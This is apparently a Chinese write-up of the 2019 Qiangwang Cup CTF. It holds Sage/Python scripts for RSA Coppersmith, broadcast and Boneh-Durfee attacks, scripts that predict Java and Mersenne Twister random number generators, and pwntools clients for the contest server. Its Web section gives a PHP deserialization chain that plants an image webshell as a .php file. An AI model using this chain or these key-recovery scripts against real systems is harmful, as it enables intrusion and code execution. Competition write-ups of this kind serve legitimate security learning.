2019 强网杯 wp

Crypto

COPPERSTUDY

俄罗斯套娃一样的题目,和去年一样,今年是考 Coppersmith 相关攻击,主要参考ctf wiki https://ctf-wiki.github.io/ctf-wiki/crypto/asymmetric/rsa/rsa_coppersmith_attack/#known-high-bits-message-attack

github:https://github.com/mimoo/RSA-and-LLL-attacks

第一关:

已知明文的高位,低72位不知道,从https://github.com/mimoo/RSA-and-LLL-attacks 这里找的脚本,改的脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
N=0x8d28bda1fbb8190dd9f530c6c8b388f74749a2a957092bef9bb0d3439950aa22cb1638dd09eee5e08fb5da22d5d063f69b7e2aa087041eea9c9d78440e2abc0b9f5c922f30d69a2bce2416df4f9c5383adac8e933bd10c6cf56352db8e46cc65fc5b8109def1f91d553610a3b05e8c0f66d917c4c47fc04297b8e1817cf84dL
length_N = 1016
e=3
Kbits = 72
ZmodN = Zmod(N)
C=0x57916d30c7568749b98f0f688bf80c2cd0d3394039b4b3485aa6c094a269f13ee0dec44bc03c5ce5ff2e43384252f3ea658a88f8fc3e90dd022da6842579a6fc1e0adf19323c1188647845b9b938b7610684bab06eae88e40892aaea5503bc1ea5066a4cfc69c08c576d08fa69f28c888afb94b0dd882acd45c6ace2bc49c4L
part_m=0x81db7350876267d03e36e3dd70129e08167e715c6508ac4ee1afbd4992ad0ac8a5021ab1c084f8b087ab72a155989816a263213d62449000000000000000000L
P.<x> = PolynomialRing(ZmodN) #, implementation='NTL')
pol = (part_m + x)^e - C
dd = pol.degree()

beta = 1 # b = N
epsilon = beta / 7 # <= beta / 7
mm = ceil(beta**2 / (dd * epsilon)) # optimized value
tt = floor(dd * mm * ((1/beta) - 1)) # optimized value
XX = ceil(N**((beta**2/dd) - epsilon))

start_time = time.time()
roots = coppersmith_howgrave_univariate(pol, N, beta, mm, tt, XX)

result=part_m+roots[0]
##result=425073431519458914714078012425419177266636080842324683032155837727713301740606335541361888317818841093831762175806435562415181409265511020138003062793538

第二关:

已知 p 高位攻击,xman 排位赛靠这题翻盘的。。直接拿脚本来用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
n=0x372d81ecfff69fcb7317e7c0190d03e7f0a4ba85aeee3d98a13286a4b3914a0f5503c3a422b6f7e673c4008b0e77b2fc02c26b47fba10b2b5a2079dbc6402becc7175846854b0f5b0186b3b723b3b82c99ac57bdde624c9bb1b40fde1ffbdede598355ad3c8db3b92eda266b8fa6487bab3b07dfaf6ea27aa55384816f1c6cfdL
pp = 0x84ff948225107a552a08aea00214eb9f7f97d9dcafa08d04840bebfc5bea2e05b95153f19e79dea79b1486421ed747ca
e = 0x10001
c=0xf90f4099336dc4dee753268e2aadf57211415f8fd307829702eef202dc0b5c11d5c8e4627cf90c57d23b4e3ac545aef20773fa9f21a2c49a71bcda715452b0ab62c9b36a7c838868d0e229eede374bff33a7defc1a229a45a1e568cb8e8031e8a8d5a1e36268b5732024fa3b13d77eb33425bf812de98abc7934295041e1367L
pbits=512
for b in range(0,2**9):
p=pp << 9
p +=b
kbits = pbits-p.nbits()
p=p<<kbits
PR.<x> = PolynomialRing(Zmod(n))
f = x + p
try:
roots = f.small_roots(X=2^kbits, beta=0.4)[0]
p2=int(p+roots)
q=n/int(p2)
print "p:",p2
print "q:",q
phin = (p2-1)*(q-1)
except:
pass

第三关:

已知d低位,找脚本跑:https://code.felinae98.cn/ctf/crypto/rsa%E5%A4%A7%E7%A4%BC%E5%8C%85%EF%BC%88%E4%BA%8C%EF%BC%89coppersmith-%E7%9B%B8%E5%85%B3/

这里坑了很久,因为给的d低位是512 位,跑脚本总是报错,之后才发现原来给的位数太多,代码中有个数变成负数了…

image.png

我改成了利用后500位,就好了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
def partial_p(p0, kbits, n):
PR.<x> = PolynomialRing(Zmod(n))
nbits = n.nbits()

f = 2^kbits*x + p0
f = f.monic()
roots = f.small_roots(X=2^(nbits//2-kbits), beta=0.3) # find root < 2^(nbits//2-kbits) with factor >= n^0.3
if roots:
x0 = roots[0]
p = gcd(2^kbits*x0 + p0, n)
return ZZ(p)

def find_p(d0, kbits, e, n):
X = var('X')

for k in xrange(1, e+1):
results = solve_mod([e*d0*X - k*X*(n-X+1) + k*n == X], 2^kbits)
for x in results:
p0 = ZZ(x[0])
p = partial_p(p0, kbits, n)
if p:
return p


if __name__ == '__main__':
n=0x77789924c9cee176e8f9ae4a40d29c0a61891d67fc825b6e1570e980a8cb275f138d5f6e118eff6f76673b382cfaaa4f4a9c204ee30d7c887a5c70197bc2701f7f61da8c65e6972398d2842faa51d3274ee99716e56fba888a91263b5e7986363b75c82a86fc9a964aa65b03ede04b4ae0dfb6f96a7fb928e04d092d782148d
e = 3
d = 0x4bf6610df9dd72df11b3c273d8795b7765374a73e1f3e18abb0af883e1d546cc2fca3ab53e5b18baa228053972472d23e87f411e1f2781faa89ede9bc09b4d53
nbits = n.nbits()
kbits = 500
d0 = d & (2^kbits-1)
print "lower %d bits (of %d bits) is given" % (kbits, nbits)

p = find_p(d0, kbits, e, n)
print "found p: %d" % p
q = n//p
print d
print inverse_mod(e, (p-1)*(q-1))

第四关:

广播攻击,脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# -*- coding: utf-8 -*-
from gmpy2 import *
from Crypto.Util.number import *
def GCRT(mi, ai):
# mi,ai分别表示模数和取模后的值,都为列表结构
assert (isinstance(mi, list) and isinstance(ai, list))
curm, cura = mi[0], ai[0]
for (m, a) in zip(mi[1:], ai[1:]):
d = gcd(curm, m)
c = a - cura
assert (c % d == 0) #不成立则不存在解
K = c / d * invert(curm / d, m / d)
cura += curm * K
curm = curm * m / d
n2=0x3d9e0e106474d42db39ba27c96cf830737ee86ee77ff03298f1f0460612e9488e7ad402a1f2aacef1a13c4cf75b457e9957f798fcfdb2d510af2a6fceab71cd64c717df829e755bf8573edda4e98269da9eaf6e89c1c656970c7e1dbf9c0a39b4efcb64c9ba805cc8b22ab90022491abea03cc03ac6a6aabcaa210c30ac00f5fL
c1=0x64f9355e681326771f3fdd7d07c46cf493dfd7199b9b16b2d33493c3afd33ef4f35184b75de30e27ab452d3addc2f81e9547d9cb061e9f14396e7387e43e637f2004cc83ad81c0930c144d8587e25330290e808c79730db770934ea034a00223f674a484a0efa0df2d2b649fce492facaa79a6aa9344dd4b5b6e02915c40008aL
n1=0x7f084b13487e7e0f2e9d6976cb41e825e0dac9bf13a5712bd1610b17b5c1cec51fe98938f5d4e73e6b9af2f92b95383ed39c6a0be779fdf3275a059e55014bbe4c4dd337b72db18e704d5bbe291d06d9c1b263cdb7719ccd6cf57d812a2a54f369696d04c166617f56b3010e07f98354d05e9116add4281edee2ac32f70fb317L
c2=0xf8f04645ea1d7f3aaaea76a17ad8c20c1483c457135d5a29721d11f206fb2b7e17293f0c0b5be7eaf55f1917367881a2c3403b319a22a53336ee4848b6d255e4e26df500ca54c6317611ac1181a739288362a6084a53342032517ea2b623d332264571003af203c9cd2e8269a9933dfacaf50442f298d99d699d3e4c3511bc9L
n3=0x6e24ae9edc6e30e5ed4fd5982914bf0d4cba5695a47752858d057f0c20ffc9de7471bea76ac4bd336b51cafc7aeb24f3f76bab3e0ede10b214b1c68584db0abf4c9854ae98ffabb01b503f76604b8dead5520e1c3e6750be75580b683e4630c1f6b5e0575e8be9ecd6a68e16dc1fbb3f60fbb0159ee951c8a858cf6a66d83a53L
c3=0x4cf28e0b122c9727cff60c7d71192573c231673cd7742ba18e9e5d391a346bc470e693a308ca65454913569f3d0e5f0f15c62afa2285644fc5b9919c22e87ca8f746eec9cff7b1e97761ae3145e3c007acc603928e3c04d47067c2325070cbdea41c6fca21665eb186f26e3e275c456427bf7da1b5bd325eac16c2710ff5102eL
e=3
C,N=GCRT([n1,n2,n3],[c1,c2,c3])
m=iroot(C,3)[0]
print long_to_bytes(m).encode("hex")

第五关:

Related Message Attack,代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# -*- coding: utf-8 -*-
from gmpy2 import *
from Crypto.Util.number import *
def getmessage(a, b, c1, c2, n):
b3 = powmod(b, 3, n)
part1 = b * (c1 + 2 * c2 - b3) % n
part2 = a * (c1 - c2 + 2 * b3) % n
part2 = invert(part2, n)
return (part1 * part2) % n
n=0x4050e234e683b2527380ea84d391151be80831abcd540f3467a31511d708b0be459725b39581a3d4edcffa856f31b1eca19a37b7e7c34e378bb3ed7e660b4a19d24769497d26aea09eab0e2a2849d006cb4b1f61b6b7ee4c3ec3fc58383e3c6eb2fcfbe9c36343bfe74fec5e952e477bd4493f01a0a81092d680a776b1a555e7L
c1=0x3fa7da49d8cbc6fe46bf15b9c35107fc0fe043eb3c94c1b6f214bf3943ed5310cb92e8aea576c6074a518f9a5b7d3de535158146ed3a74a298d98f55712359e795f1e83f253c61344617c5e35933c902fd49e50f37dbac51c23f2a0b954247b8af376444faca957db97f94b42dda469acfc5aab7574a486f6e326bfee0aa420dL
c2=0x3edc18248feddad66f95550e3ec77d1de26dd9236824d049587aa567fa52e9290dee4416c78c39adda36b6eb1169df42b68a5cebdb07a784223c07680c3cd64c19f9fb7483d5ab7cd6d7bebf07ae0da0ee91557d9f1bbcbc8b9f7362f37050d718dca8fbd8749ab7dad7a531876fb3db988f3598ed6ce7c9d32102986a68a9a1L
e=3
print long_to_bytes(getmessage(1,1,c2,c1,n)).encode("hex")

第六关:

Boneh and Durfee attack,从https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage上改的。

最终exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
import string
from hashlib import sha256
import itertools
context.log_level="debug"

dict=[chr(i) for i in range(256)]
token='35561ebb6d2cd5f8f6dddd1c1f60b613'

def Pow(part_hex,hash_value):
pre=part_hex.decode("hex")
for s in itertools.product(dict,repeat=3):
i=pre+''.join(s)
if sha256(i).hexdigest()==hash_value:
print "success"
return i.encode("hex")
r=remote("119.3.245.36",12345)
r.recv()
r.recvuntil(".hexdigest()=")
hash_value=r.recv(64)
r.recvuntil(".encode('hex')=")
part_hex=r.recv(10)
print hash_value,part_hex
result=Pow(part_hex,hash_value)
r.recv()
r.sendline(result)
r.sendlineafter('teamtoken:',token)
r.recvuntil("Generating challenge 1\n")
r.recv()
r.recv()
r.sendline("081db7350876267d03e36e3dd70129e08167e715c6508ac4ee1afbd4992ad0ac8a5021ab1c084f8b087ab72a155989816a263213d624490a8888766ecc472542")
r.sendlineafter("encode('hex')=","21d2ce15ce3916a5e3b661de35d132dc32bac36de0e8288baa7a1a36207e6e54b643e701445398fee048b0912090996b5924bf36e5765334ef1029eb05ac128e")
r.sendlineafter("encode('hex')=","0a56f8eff78995a1a80369469acbfa87b8d17c6918bff28246a6a9c0ffa6875b2f33b3399326b6929e49c22bbba63f71b04b0d45a7b1ac808f5dff41475ae5d5")
r.sendlineafter("encode('hex')=","0f30aba3355b7ead17f6768158fff2ccdc6e66f8123bb283864e70629bfe0db705b68e299e337c3a4ce1596d880b72689bfab8d066e568b00998ad13330f3dad")
r.sendlineafter("encode('hex')=","499f89d02d2d95427229d369d86d26063465523c49176ffed8786cc7b258cb647f79512cbb9ecab746d8f322f42ae6fd71362ee6e9e6086c34865d626cbab2da")
r.sendlineafter("encode('hex')=","6b3bb0cdc72a7f2ce89902e19db0fb2c0514c76874b2ca4113b86e6dc128d44cc859283db4ca8b0b5d9ee35032aec8cc8bb96e8c11547915fc9ef05aa2d72b28")
r.recvuntil("encode('hex')=")

image.png

RANDOMSTUDY

第一关,仿照服务器生成种子的时间,这边也生成个大概的时间,爆破:

第二关,java random nextint 可以通过生成的两个数来预测种子,java文件在这里:https://github.com/fta2012/ReplicatedRandom/blob/master/ReplicatedRandom.java

简单改一下java文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import java.util.ArrayList;
import java.util.Random;

public class ReplicatedRandom extends Random {
// Replicate the state of a Random using a single value from its nextDouble
public boolean replicateState(double nextDouble) {
// nextDouble() is generated from ((next(26) << 27) + next(27)) / (1L << 53)
// Inverting those operations will get us the values of next(26) and next(27)
long numerator = (long)(nextDouble * (1L << 53));
int first26 = (int)(numerator >>> 27);
int last27 = (int)(numerator & ((1L << 27) - 1));
return replicateState(first26, 26, last27, 27);
}

// Replicate the state of a Random using a single value from its nextLong
public boolean replicateState(long nextLong) {
int last32 = (int)(nextLong & ((1L << 32) - 1));
int first32 = (int)((nextLong - last32) >> 32);
return replicateState(first32, 32, last32, 32);
}

// Replicate the state of a Random using two consecutive values from its nextInt
public boolean replicateState(int firstNextInt, int secondNextInt) {
return replicateState(firstNextInt, 32, secondNextInt, 32);
}

// Replicate the state of a Random using two consecutive values from its nextFloat
public boolean replicateState(float firstNextFloat, float secondNextFloat) {
return replicateState((int)(firstNextFloat * (1 << 24)), 24, (int)(secondNextFloat * (1 << 24)), 24);
}

public boolean replicateState(int nextN, int n, int nextM, int m) {
// Constants copied from java.util.Random
final long multiplier = 0x5DEECE66DL;
final long addend = 0xBL;
final long mask = (1L << 48) - 1;

long upperMOf48Mask = ((1L << m) - 1) << (48 - m);

// next(x) is generated by taking the upper x bits of 48 bits of (oldSeed * multiplier + addend) mod (mask + 1)
// So now we have the upper n and m bits of two consecutive calls of next(n) and next(m)
long oldSeedUpperN = ((long)nextN << (48 - n)) & mask;
long newSeedUpperM = ((long)nextM << (48 - m)) & mask;

// Bruteforce the lower (48 - n) bits of the oldSeed that was truncated.
// Calculate the next seed for each guess of oldSeed and check if it has the same top m bits as our newSeed.
// If it does then the guess is right and we can add that to our candidate seeds.
ArrayList<Long> possibleSeeds = new ArrayList<Long>();
for (long oldSeed = oldSeedUpperN; oldSeed <= (oldSeedUpperN | ((1L << (48 - n)) - 1)); oldSeed++) {
long newSeed = (oldSeed * multiplier + addend) & mask;
if ((newSeed & upperMOf48Mask) == newSeedUpperM) {
possibleSeeds.add(newSeed);
}
}

if (possibleSeeds.size() == 1) {
// If there's only one candidate seed, then we found it!
setSeed(possibleSeeds.get(0) ^ multiplier); // setSeed(x) sets seed to `(x ^ multiplier) & mask`, so we need another `^ multiplier` to cancel it out
return true;
}
if (possibleSeeds.size() >= 1) {
System.out.println("Didn't find a unique seed. Possible seeds were: " + possibleSeeds);
} else {
System.out.println("Failed to find seed!");
}
return false;
}
public static void main(String[] args){
int i1=Integer.parseInt(args[0]);
int i2=Integer.parseInt(args[1]);
ReplicatedRandom rr = new ReplicatedRandom();
rr.replicateState(i1, i2);
System.out.println( rr.nextInt());
}
}

编译一下java文件,这样我们就可以通过python的subprocess调用class文件了,再把运行的结果获取到。

第三关:可以通过生成的随机数序列来预测,参考:https://github.com/kmyk/mersenne-twister-predictor

最终exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
from pwn import *
import itertools
from hashlib import sha256
import random
import subprocess
from mt19937predictor import MT19937Predictor

context.log_level="debug"

dict=[chr(i) for i in range(256)]
token='35561ebb6d2cd5f8f6dddd1c1f60b613'

def Pow(part_hex,hash_value):
pre=part_hex.decode("hex")
for s in itertools.product(dict,repeat=3):
i=pre+''.join(s)
if sha256(i).hexdigest()==hash_value:
print "success"
return i.encode("hex")

r=remote("119.3.245.36",23456)
r.recv()
r.recvuntil(".hexdigest()=")
hash_value=r.recv(64)
r.recvuntil(".encode('hex')=")
part_hex=r.recv(10)
print hash_value,part_hex
result=Pow(part_hex,hash_value)
r.sendline(result)
r.sendlineafter('teamtoken:',token)
r.recvuntil('Generating challenge 1')
base=int(time.time())

def challenge1(base):
for i in range(200):
random.seed(base)
for j in range(i+1):
data=random.randint(0,2**64)
r.recvuntil("[-]",timeout=1)
r.sendline(str(data))
if "completed" in r.recv():
return
base=base-1
challenge1(base)

def challenge2():
for i in range(200):
r.recvuntil("[-]")
v1=r.recvuntil("\n").strip()
r.recvuntil("[-]")
v2=r.recvuntil("\n").strip()
try:
o = subprocess.check_output(["/usr/lib/jvm/jdk-12.0.1/bin/java", "ReplicatedRandom",v1,v2])
result=o.strip()
except:
result="123"
r.sendline(result)
data=r.recv()
print "123"+data
if "completed" in r.recv():
return
challenge2()

def challenge3():
predictor = MT19937Predictor()
for i in range(624):
r.sendline("123")
r.recvuntil("[+]failed:")
data=r.recvuntil("[-]")
predictor.setrandbits(int(data[:-4]), 32)
result=predictor.getrandbits(32)
r.sendline(str(result))
r.recvuntil("flag")
challenge3()

强网先锋——辅助

送分题,两个n算最大公因数:

1
2
3
4
5
6
7
8
9
10
11
12
from gmpy2 import *
from Crypto.Util.number import *

n1=14967030059975114950295399874185047053736587880127990542035765201425779342430662517765063258784685868107066789475747180244711352646469776732938544641583842313791872986357504462184924075227433498631423289187988351475666785190854210389587594975456064984611990461126684301086241532915267311675164190213474245311019623654865937851653532870965423474555348239858021551589650169602439423841160698793338115204238140085738680883313433574060243600028500600824624358473403059597593891412179399165813622512901263380299561019624741488779367019389775786547292065352885007224239581776975892385364446446185642939137287519945974807727
n2=14624662628725820618622370803948630854094687814338334827462870357582795291844925274690253604919535785934208081825425541536057550227048399837243392490762167733083030368221240764693694321150104306044125934201699430146970466657410999261630825931178731857267599750324918610790098952520113593130245010530961350592735239454337631927669542026935873535964487595433984902529960726655481696404006628917922241666148082741874033756970724357470539589848548704573091633917869387239324447730587545472564561496724882799495186768858324490838169123077051890332313671220385830444331578674338014080959653201802476516237464651809255679979

p=gcd(n1,n2)
q=n1/p
e=65537
c=2482083893746618248544426737023750400124543452082436334398504986023501710639402060949106693279462896968839029712099336235976221571564642900240827774719199533124053953157919850838214021934907480633441577316263853011232518392904983028052155862154264401108124968404098823946691811798952747194237290581323868666637357604693015079007555594974245559555518819140844020498487432684946922741232053249894575417796067090655122702306134848220257943297645461477488086804856018323986796999103385565540496534422406390355987976815450744535949785073009043007159496929187184338592859040917546122343981520508220332785862546608841127597
d=invert(e,(p-1)*(q-1))
print long_to_bytes(pow(c,d,n1))

Web

upload

www.tar.gz 源码泄露。上传一个图片马,因为后缀名是png不能解析,利用cookie反序列化,把图片马写到php后缀的文件里:

image.png

这里filename可控,调用upload_img方法就可以了。

把源码拖下来放到本地web根目录,修改index.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
<?php
namespace app\web\controller;
use think\Controller;

class Index extends Controller
{
public $profile;
public $profile_db;

public function index()
{
if($this->login_check()){
$curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/home";
$this->redirect($curr_url,302);
exit();
}
return $this->fetch("index");
}

public function home(){
if(!$this->login_check()){
$curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
$this->redirect($curr_url,302);
exit();
}

if(!$this->check_upload_img()){
$this->assign("username",$this->profile_db['username']);
return $this->fetch("upload");
}else{
$this->assign("img",$this->profile_db['img']);
$this->assign("username",$this->profile_db['username']);
return $this->fetch("home");
}
}

public function login_check(){
$profile=cookie('user');
if(!empty($profile)){
$this->profile=unserialize(base64_decode($profile));
$this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
if(array_diff($this->profile_db,$this->profile)==null){
return 1;
}else{
return 0;
}
}
}

public function check_upload_img(){
if(!empty($this->profile) && !empty($this->profile_db)){
if(empty($this->profile_db['img'])){
return 0;
}else{
return 1;
}
}
}

public function logout(){
cookie("user",null);
$curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
$this->redirect($curr_url,302);
exit();
}

public function __get($name)
{
return "";
}

}
$test = new Profile();
$test->checker = 0;
$test->except = array('index'=>'upload_img');
$test->ext = 'php';
$test->filename_tmp = './upload/08856017fa6b6b422db719c5519123dc/8266e4bfeda1bd42d8f9794eb4ea0a13.png';
$test->filename = './upload/08856017fa6b6b422db719c5519123dc/gml.php';

$a= new Register();
$a->checker = $test;
$a->registed =0;

$exp = base64_encode(serialize($a));
var_dump($exp);

访问:

image.png

cookie传过去,发现写入成功:

image.png

getflag:

image.png

强网先锋——上单

在log里发现payload:

image.png

打一下:

image.png

getflag:

1558881058312

-------------本文结束感谢您的阅读-------------
0%